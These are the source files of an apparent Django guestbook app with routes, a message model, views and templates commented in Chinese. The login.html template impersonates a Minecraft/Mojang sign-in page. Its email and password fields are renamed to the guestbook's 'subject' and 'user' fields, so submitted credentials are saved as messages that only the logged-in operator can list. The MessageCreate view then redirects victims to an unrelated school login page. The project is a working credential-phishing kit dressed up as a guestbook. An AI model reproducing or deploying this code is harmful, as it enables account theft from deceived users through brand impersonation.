guestbook/urls.py
"""guestbook URL Configuration

`urlpatterns`列表將URL路由到視圖。 有關更多信息，請參閱：
    https://docs.djangoproject.com/en/2.1/topics/http/urls/
例如：
Function views
    1. 導入:  from my_app import views
    2. 新增URL到urlpatterns:  path('', views.home, name='home')
Class-based views
    1. 導入:  from other_app.views import Home
    2. 新增URL到urlpatterns:  path('', Home.as_view(), name='home')
Including another URLconf
    1. 導入 include() function: from django.urls import include, path
    2. 新增URL到urlpatterns:  path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf.urls import include
from django.views.generic import RedirectView

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', RedirectView.as_view(url='/message/')),
    path('message/', include('web.urls')),  
    path('accounts/', include('django.contrib.auth.urls')),  
]

web/urls.py
from django.urls import path
from . import views

urlpatterns = [
    path('', views.MessageList.as_view()),
    path('create/', views.MessageCreate.as_view()),  
    path('<int:pk>', views.MessageDetail.as_view()),
    path('<int:pk>/delete/', views.MessageDelete.as_view()),   
]

web/models.py
from django.db import models

# Create your models here.

class Message(models.Model):
    user = models.CharField("姓名", max_length=50)
    subject = models.CharField("主旨", max_length=200)
    content = models.TextField("內容")
    publication_date = models.DateTimeField("留言日期", auto_now_add=True)

    def __str__(self):
        return self.subject

web/views.py
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
from django.urls import reverse
from .models import Message

# 留言列表
class MessageList(ListView):
    model = Message
    ordering = ['-id']      # 以 id 欄位值由大至小反向排序

# 留言檢視
class MessageDetail(DetailView):
    model = Message

# 新增留言
class MessageCreate(CreateView):
    model = Message
    fields = ['user', 'subject', 'content']     # 僅顯示 user, subject, content 這 3 個欄位
    success_url = 'https://ecourse.dcsh.tp.edu.tw/login/index.php'                   # 新增成功後，導向留言列表
    template_name = 'form.html'                 # 指定欲使用的頁面範本

    # 刪除留言
class MessageDelete(DeleteView):
    model = Message
    success_url = '/message/#LastLine'                # 刪除成功返回留言列表
    template_name = 'confirm_delete.html'

web/templates/confirm_delete.html
{% extends "base.html" %}

{% block content %}
<h1>刪除記錄</h1>
{% if user.is_authenticated %}
<p>您確定要刪除這筆記錄嗎?</p>
<form action="" method="POST">
  {% csrf_token %}
  <input type="submit" value="是的，我要刪除" class="btn btn-sm btn-danger" />
</form>
{% else %}
<p>你沒有權限刪除這筆記錄 !</p>
{% endif %}
{% endblock %}

web/templates/form.html
{% extends "base.html" %}

{% block content %}

{% endblock %}

web/templates/login.html
<form action="" method="post" id="search_form">
    {% csrf_token %}
    <th><h2 for="id_user" style="color: rgb(56, 54, 54);">登入</h2></th>
    <th><label for="id_user">用您的 Mojang 帳戶登入 minecraft.net</label></th>
    <table class="table">
      <tr>
        </tr><tr>
        <td><label for="id_subject" style="float: left;">E-mail：</label><input id="id_subject" type="email" name="subject" class="form-control"></td>
      </tr>
      <tr>
        <br>
      </tr><tr>
        <td><label for="id_user" style="float: left;">密碼：</label><input id="id_user" type="password" name="user" class="form-control"><br><a href="http://my.minecraft.net/zh-hant/password/forgot/" style="float: left;">忘記密碼了嗎？</a></td>
      </tr>
      <tr style="display: none;">
        <th><label for="id_content">內容：</label></th>
        <br>
        <td><textarea name="content" id="id_content" cols="30" rows="10" class="form-control">帳號/密碼</textarea></td>
      </tr>
    </table>   
    <a class="nav-link btn btn-sm btn-primary" href="javascript:document:search_form.submit();"><h3>登入</h3></a>
    <a href="http://my.minecraft.net/zh-hant/store/minecraft/">沒有帳號?在這裡註冊！</a>
</form>

web/templates/navbar.html
<nav class="ms-footer">
    <!-- 網站標誌 -->
    <!-- 展開/收合切換鈕(畫面小時才會顯示) -->
    <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
      <span class="navbar-toggler-icon"></span>
    </button>
    <!-- 導覽列選單內容(可收合) -->
    <div class="collapse navbar-collapse" id="navbarNav">
      <ul class="navbar-nav ml-auto">
        {% if user.is_authenticated %}
        <li class="nav-item"><a href="/" class="nav-link"><i class="fas fa-home"></i>首頁</a></li>            
        <li class="nav-item"><a href="/message/create" class="nav-link"><i class="far fa-edit"></i>新增</a></li>
        <li class="nav-item"><a href="/accounts/logout" class="nav-link btn btn-sm btn-primary">{{ user.username }} <i class="fas fa-sign-out-alt"></i>登出</a></li>
        {% else %}
        <li class="nav-item"><a href="{% url 'login' %}" class="nav-link btn btn-sm btn-primary"><i class="fas fa-sign-in-alt"></i></a></li>
        {% endif %}
      </ul>
    </div>
  </nav>

web/templates/web/message_detail.html
{% extends "base.html" %}

{% block content %}
<div class="card mt-2">
  <div class="card-header">
    <div class="font-weight-bold"><i class="fas fa-file-alt"></i> {{ message.subject }}</div>
  </div>
  <div class="card-body">    
    <div class="card-text">{{ message.content|linebreaks }}</div>    
  </div>
  <div class="card-footer d-flex justify-content-between">
    <small class="text-muted"><i class="fas fa-user"></i> {{ message.user }}</small>
    <small class="text-muted"><i class="fas fa-clock"></i> {{ message.publication_date|date:"Y/m/d H:i" }}</small>
  </div>
</div>
{% endblock %}

web/templates/web/message_list.html
{% extends "base.html" %}

{% block content %}
{% if user.is_authenticated %}
<ul class="list-group mt-2">
  {% for message in message_list %}
  <li class="list-group-item list-group-item-action">
    <small class="text-muted"><i class="fas fa-clock"></i> {{message.publication_date|date:"Y/m/d H:i"}}</small>
    {% if user.is_authenticated %}
    <a href="{{message.id}}/delete/#LastLine" class="text-danger" title="刪除"><i class="fas fa-minus-circle"></i></a>
    {% endif %}
    <a href="{{message.id}}">{{ message.subject }}</a> 
  </li>
  {% endfor %}
</ul>
{% endif %}
{% endblock %}